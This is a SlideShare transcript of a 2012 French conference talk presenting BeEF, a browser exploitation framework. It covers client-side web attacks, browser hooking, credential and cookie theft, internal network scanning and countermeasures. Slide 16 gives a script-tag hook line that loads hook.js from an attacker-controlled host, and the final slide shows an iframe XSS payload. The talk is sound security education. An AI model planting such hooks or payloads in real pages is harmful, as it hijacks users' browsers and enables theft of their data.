BeEF : Browser Exploitation Framework18 Septembre 2012Presented byEtienne Maynier
Présentation BeEF - RéSIST                                                                         Septembre 2012# whoami•...
Présentation BeEF - RéSIST                                                                         Septembre 2012Sommaire ...
Présentation BeEF - RéSIST                                                                         Septembre 2012Disclaime...
Présentation BeEF - RéSIST                                                                                 Septembre 2012I...
Présentation BeEF - RéSIST                                                                         Septembre 2012Attaques ...
Présentation BeEF - RéSIST                                                                           Septembre 2012Same Or...
Présentation BeEF - RéSIST                                                                         Septembre 2012Cross Sit...
Présentation BeEF - RéSIST                                                                         Septembre 2012ClickJack...
Présentation BeEF - RéSIST                                                                         Septembre 2012Quelques ...
Présentation BeEF - RéSIST                                                                         Septembre 2012Exemples•...
Présentation BeEF - RéSIST                                                                         Septembre 2012Page 12  ...
Présentation BeEF - RéSIST                                                                         Septembre 2012Architect...
Présentation BeEF - RéSIST                                                                                        Septembr...
Présentation BeEF - RéSIST                                                                                         Septemb...
Présentation BeEF - RéSIST                                                                         Septembre 2012Hooking• ...
Présentation BeEF - RéSIST                                                                         Septembre 2012Persistan...
Présentation BeEF - RéSIST                                                                          Septembre 2012        ...
Présentation BeEF - RéSIST                                                                         Septembre 2012Récupérat...
Présentation BeEF - RéSIST                                                                                Septembre 2012  ...
Présentation BeEF - RéSIST                                                                         Septembre 2012Social En...
Présentation BeEF - RéSIST                                                                         Septembre 2012         ...
Présentation BeEF - RéSIST                                                                         Septembre 2012Get Inter...
Présentation BeEF - RéSIST                                                                         Septembre 2012Ping Swee...
Présentation BeEF - RéSIST                                                                         Septembre 2012DNS Enume...
Présentation BeEF - RéSIST                                                                         Septembre 2012Port Scan...
Présentation BeEF - RéSIST                                                                         Septembre 2012Network F...
Présentation BeEF - RéSIST                                                                         Septembre 2012Remote CS...
Présentation BeEF - RéSIST                                                                                   Septembre 201...
Présentation BeEF - RéSIST                                                                         Septembre 2012Page 30  ...
Présentation BeEF - RéSIST                                                                         Septembre 2012Metasploi...
Présentation BeEF - RéSIST                                                                                Septembre 2012  ...
Présentation BeEF - RéSIST                                                                                                ...
Présentation BeEF - RéSIST                                                                         Septembre 2012XSS Rays ...
Présentation BeEF - RéSIST                                                                         Septembre 2012XSS Rays ...
Présentation BeEF - RéSIST                                                                         Septembre 2012         ...
Présentation BeEF - RéSIST                                                                         Septembre 2012Côté Appl...
Présentation BeEF - RéSIST                                                                         Septembre 2012Côté clie...
Présentation BeEF - RéSIST                                                                         Septembre 2012Côté rése...
Présentation BeEF - RéSIST                                                                              Septembre 2012    ...
Présentation BeEF - RéSIST                                                                                                ...
Présentation BeEF - RéSIST                                                                         Septembre 2012Référence...
Présentation BeEF - RéSIST                                                                         Septembre 2012Bonus : V...
Upcoming SlideShare
Loading in …5
×

BeEF : The Browser Exploitation Framework

1,800 views
1,723 views

Published on

Cette présentation a été réalisée à Résist (groupe de l'OSSIR sur Toulouse) en Septembre 2012.
Elle présente succintement l'outil BeEF.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,800
On SlideShare
0
From Embeds
0
Number of Embeds
23
Actions
Shares
0
Downloads
7
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

BeEF : The Browser Exploitation Framework

  1. 1. BeEF : Browser Exploitation Framework18 Septembre 2012Presented byEtienne Maynier
  2. 2. Présentation BeEF - RéSIST Septembre 2012# whoami• Pentest / audit sécurité• Intéressé par l’exploitation, la sécurité Web, le fuzzing, la sécurité réseau…• Participation à des projets opensource à mes heures perdues (BeEF, sulley)• MDAL !Page 2 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  3. 3. Présentation BeEF - RéSIST Septembre 2012Sommaire • Le Web côté client • BeEF • Présentation • Démo • Contre Mesures ?Page 3 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  4. 4. Présentation BeEF - RéSIST Septembre 2012Disclaimer If anything can go wrong, it will.Page 4 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  5. 5. Présentation BeEF - RéSIST Septembre 2012Intro Web !Page 5 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  6. 6. Présentation BeEF - RéSIST Septembre 2012Attaques web côté client• Le navigateur comme point d’entrée sur le poste de travail : • Phishing • Compromission de sites légitimes • XSS  Persistantes  Réfléchies  DOM-basedPage 6 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  7. 7. Présentation BeEF - RéSIST Septembre 2012Same Origin Policy• Limitation des actions au domaine • Domaine = Protocole + FQDN + port • Limitation d’accès au domaine pour les cookies, la DOM… • Limitation des XML HTTP Request cross-domain • Bloquées par défaut • Ne concerne que les requêtes et pas les balises img, script, iframe, video… • Implémentation différente selon les langages ! • Javascript : sauf si le serveur répond avec le bon entête (Access-Control-Allow-Origin: http://example.com) • Java & Flash: crossdomain.xmlPage 7 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  8. 8. Présentation BeEF - RéSIST Septembre 2012Cross Site Request ForgeryImage: http://shiflett.orgPage 8 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  9. 9. Présentation BeEF - RéSIST Septembre 2012ClickJacking Bouton sur un bouton : •Utilise la préauthentification de l’utilisateur sur le site • Ne permet pas d’injecter de paramètres POST ou de modifier la pageImage: http://t37.netPage 9 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  10. 10. Présentation BeEF - RéSIST Septembre 2012Quelques chiffres• 75% des sites hébergeant du code malveillant sont des sites légitimes compromis1• 60% des 100 sites les plus populaires ont été impliqués ou ont hébergé une activité malveillante dans la première moitié de l’année 20081• XSS découverts dans 55% des sites web testés par White Hat Security (1er type de vulnérabilité) 2 1 - Websense, State of Internet Security, 2008 2 – WhiteHat Security Website Statistics Report, Summer 2012Page 10 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  11. 11. Présentation BeEF - RéSIST Septembre 2012Exemples• 2005 : XSS dans Google.com• 2006 : CSRF dans Digg• 2007 : Ver XSS MySpace de Samy Kamkar• 2008 : CSRF dans ING permettant de lancer un transfert…• 2010 : Compromission de apache.org par une XSS « Web App Security Horror Studies », Simon Willison, 2009Page 11 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  12. 12. Présentation BeEF - RéSIST Septembre 2012Page 12 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  13. 13. Présentation BeEF - RéSIST Septembre 2012Architecture •Ruby avec rails •Javascript avec Jquery Source: beefproject.comPage 13 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  14. 14. Présentation BeEF - RéSIST Septembre 2012Interface (1/2) Zombies Infos sur le navigateurPage 14 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  15. 15. Présentation BeEF - RéSIST Septembre 2012Interface (2/2) Description Historique CommandesPage 15 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  16. 16. Présentation BeEF - RéSIST Septembre 2012Hooking• Lancement d’un script • <script src="http://10.1.1.1:3000/hook.js"></script> • Marquage du navigateur avec Evercookie • Etablissement d’un Command & Control avec le navigateur • Requêtes Hello toutes les secondes • Chargement d’une API javascript BeEF basée sur jqueryPage 16 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  17. 17. Présentation BeEF - RéSIST Septembre 2012Persistance• Man In The Browser • Simulation de tous les liens en AJAX (seulement dans le domaine) • Changement des URL via history.pushState • Autrement ouverture dans un nouvel onglet/fenêtre • Le browser reste « hooké » !• Démo !Page 17 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  18. 18. Présentation BeEF - RéSIST Septembre 2012 Play with the browser !Page 18 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  19. 19. Présentation BeEF - RéSIST Septembre 2012Récupération d’informationsVol de cookies (évidemment)KeyloggerVol de clipboardListe des sites/domaines visitésFingerprint du navigateur (OS, plugins…)Webcam !…Page 19 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  20. 20. Présentation BeEF - RéSIST Septembre 2012 Social EngineeringPage 20 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  21. 21. Présentation BeEF - RéSIST Septembre 2012Social Engineering• Phishing dans le site !• Tab nabbing• Beef cloning and mass mailing en développementPage 21 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  22. 22. Présentation BeEF - RéSIST Septembre 2012 Network DiscoveryPage 22 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  23. 23. Présentation BeEF - RéSIST Septembre 2012Get Internal IPPage 23 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  24. 24. Présentation BeEF - RéSIST Septembre 2012Ping SweepPage 24 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  25. 25. Présentation BeEF - RéSIST Septembre 2012DNS EnumerationPage 25 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  26. 26. Présentation BeEF - RéSIST Septembre 2012Port ScanningPage 26 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  27. 27. Présentation BeEF - RéSIST Septembre 2012Network Fingerprinting« Intranet Footprinting », Javier Marcos de Prado, Juan Galiana LaraPage 27 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  28. 28. Présentation BeEF - RéSIST Septembre 2012Remote CSRF• CSRF trouvées dans des routeurs / Switch / Cameras • Linksys WRT54G : enable remote administration and change password • DLINK DSL500T : change password • Cisco E2400 change password • Camera DLINK DCS : change password • …Page 28 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  29. 29. Présentation BeEF - RéSIST Septembre 2012IRC NAT Pining 1 – Envoi une requête HTTP à un server IRC Simule une communication IRC 2 – Le Firewall / NAT enregistre la communication et ouvre le port 3 – Point d’entrée sur le réseau pour l’attaquant http://blog.beefproject.com/2012/07/opening-closed-ports-on-nat-device-and.html http://samy.pl/natpin/Page 29 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  30. 30. Présentation BeEF - RéSIST Septembre 2012Page 30 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  31. 31. Présentation BeEF - RéSIST Septembre 2012MetasploitIntégration directe de MSF dans BeEF par xml-rpc :Page 31 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  32. 32. Présentation BeEF - RéSIST Septembre 2012 TunnelingPage 32 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  33. 33. Présentation BeEF - RéSIST Septembre 2012Proxy Transfer Use as a proxy HTTP requests (limited by SOP)Page 33 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  34. 34. Présentation BeEF - RéSIST Septembre 2012XSS Rays (1/2)Page 34 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  35. 35. Présentation BeEF - RéSIST Septembre 2012XSS Rays (2/2)Page 35 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  36. 36. Présentation BeEF - RéSIST Septembre 2012 Contre-mesuresPage 36 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  37. 37. Présentation BeEF - RéSIST Septembre 2012Côté Applications Web• SDLC • Les injections SQL diminuent mais peu de considération pour les XSS / CSRF / Clickjacking… • « C’est juste une XSS… »• Web Application Firewall • Difficile à paramétrer et à gérer • BypassablePage 37 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  38. 38. Présentation BeEF - RéSIST Septembre 2012Côté client• Mettre à jour les navigateurs et plugins est la règle #1 ! • Java dans le navigateur est mort !• Anti XSS • IE 8 / No Script... • Compromis sécurité / fonctionnalités• Peu de protections pour la majorité des attaques • C’est « juste » du Javascript ! • Le travail est pour les navigateurs et la standardisation (HTML5…)Page 38 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  39. 39. Présentation BeEF - RéSIST Septembre 2012Côté réseau / organisation• Liste blanche des sites acceptés ! • Limite les possibilités de C&C• Gestion des incidents, réaction… • De plus en plus important avec les APTPage 39 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  40. 40. Présentation BeEF - RéSIST Septembre 2012 ConclusionPage 40 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  41. 41. Présentation BeEF - RéSIST Septembre 2012 © MDAL SARL. All rights reserved. Confidential and proprietary document. This document and all information contained herein is the sole property of MDAL SARL. No intellectual property rights are granted by the delivery of this document or the disclosure of its content. This document shall not be reproduced or disclosed to a third party without the express written consent of MDAL SARL. This document and its content shall not be used for any purpose other than that for which it is supplied. The statements made herein do not constitute an offer. They are based on the mentioned assumptions and are expressed in good faith. Where the supporting grounds for these statements are not shown, MDAL SARL. will be pleased to explain the basis thereof.Page 41 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  42. 42. Présentation BeEF - RéSIST Septembre 2012Références• http://beefproject.com/• « Intranet Footprinting », Javier Marcos de Prado, Juan Galiana Lara• “Ground BeEF: Cutting, devouring and digesting the legs off a browser”, Michele antisnatchor OrruPage 42 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  43. 43. Présentation BeEF - RéSIST Septembre 2012Bonus : Vulnérabilité Chromium <iframe srcdoc="&lt;script&gt;alert(2)&lt;/script&gt;"></iframe> Status : Won’t fix ! https://code.google.com/p/chromium/issues/detail?id=148360Page 43 © MDAL SARL. All rights reserved. Confidential and proprietary document.

×